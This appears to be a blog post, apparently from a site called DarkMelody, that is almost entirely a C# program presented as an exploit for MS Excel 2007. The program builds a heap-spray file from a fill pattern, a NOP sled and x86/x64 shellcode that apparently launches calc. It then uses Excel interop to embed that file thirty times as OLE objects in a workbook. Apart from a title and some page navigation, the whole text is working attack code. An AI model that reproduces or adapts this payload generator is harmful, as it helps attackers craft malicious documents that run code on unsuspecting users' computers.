Exploiting MS Excel 2007 with OLE embedded objects heapspray on Win7/8/10

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

using System;

using System.Collections.Generic;

using System.ComponentModel;

using System.Data;

using System.Drawing;

using System.Linq;

using System.Text;

using System.Threading.Tasks;

using System.Windows.Forms;

using System.IO;

using System.IO.Compression;

namespace WindowsFormsApplication1

{

public partial class Form1 : Form

{

public Form1()

{

InitializeComponent();

}

private void button1_Click(object sender, EventArgs e)

{

byte[] bytes = new byte[1024*1024*3];

byte[] spray1 = { 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca,

0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca,

0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca, 0x0a, 0x0a, 0x09, 0xca};

byte[] spray2 = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x31, 0xC9, 0x49, 0x31, 0xD2, 0xE3, 0x47, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x89, 0xE6, 0x52,

0x56, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C, 0xAD, 0x8B, 0x30, 0x8B, 0x7E,

0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C, 0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x4C,

0x1F, 0x24, 0x01, 0xF9, 0x0F, 0xB7, 0x2C, 0x51, 0x42, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E,

0x45, 0x75, 0xF1, 0x8B, 0x74, 0x1F, 0x1C, 0x01, 0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0x6A, 0x60,

0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32,

0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E,

0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B,

0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69,

0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01,

0xF7, 0x99, 0xFF, 0xD7};

MemoryStream mstream = new MemoryStream();

for (int i = 0; i < 1024 * 1024 * 3; i += spray1.Length + spray2.Length)

{

mstream.Write(spray1, 0, spray1.Length);

mstream.Write(spray2, 0, spray2.Length);

}

bytes = mstream.ToArray();

FileStream writeStream;

try

{

writeStream = new FileStream(“chunk.bin”, FileMode.Create);

BinaryWriter writeBinary = new BinaryWriter(writeStream);

writeBinary.Write(bytes);

writeBinary.Close();

}

catch (Exception ex)

{

MessageBox.Show(ex.ToString());

}

ExcelReaderFunctions.ExcelInsertOLE(Directory.GetCurrentDirectory() + @”\chunk.bin”);

}

public static class ExcelReaderFunctions

{

public static void ExcelInsertOLE(string path)

{

Microsoft.Office.Interop.Excel.Application excel = new Microsoft.Office.Interop.Excel.Application();

excel.Workbooks.Add();

Microsoft.Office.Interop.Excel.Workbook workBook = excel.ActiveWorkbook;

Microsoft.Office.Interop.Excel.Worksheet sheet = workBook.ActiveSheet;

Microsoft.Office.Interop.Excel.OLEObjects oleObjects = (Microsoft.Office.Interop.Excel.OLEObjects)

sheet.OLEObjects(Type.Missing);

for (int i = 0; i < 30; i++)

{

oleObjects.Add(

Type.Missing, // ClassType

path, // Filename

false, // Link

false, // DisplayAsIcon

Type.Missing, // IconFileName

Type.Missing, // IconIndex

Type.Missing, // IconLabel

Type.Missing, // Left

Type.Missing, // Top

Type.Missing, // Width

Type.Missing // Height

);

}

oleObjects.Add(

Type.Missing, // ClassType

Directory.GetCurrentDirectory() + @”\real.xls”, // Filename

false, // Link

false, // DisplayAsIcon

Type.Missing, // IconFileName

Type.Missing, // IconIndex

Type.Missing, // IconLabel

0, // Left

0, // Top

1024, // Width

768 // Height

);

excel.Visible = true;

workBook.Close(true);

excel.Quit();

}

DarkMelody

Noiselessly Of Penetrate

Exploiting MS Excel 2007 with OLE embedded objects heapspray on Win7/8/10

Debug

分类目录

文章归档

书签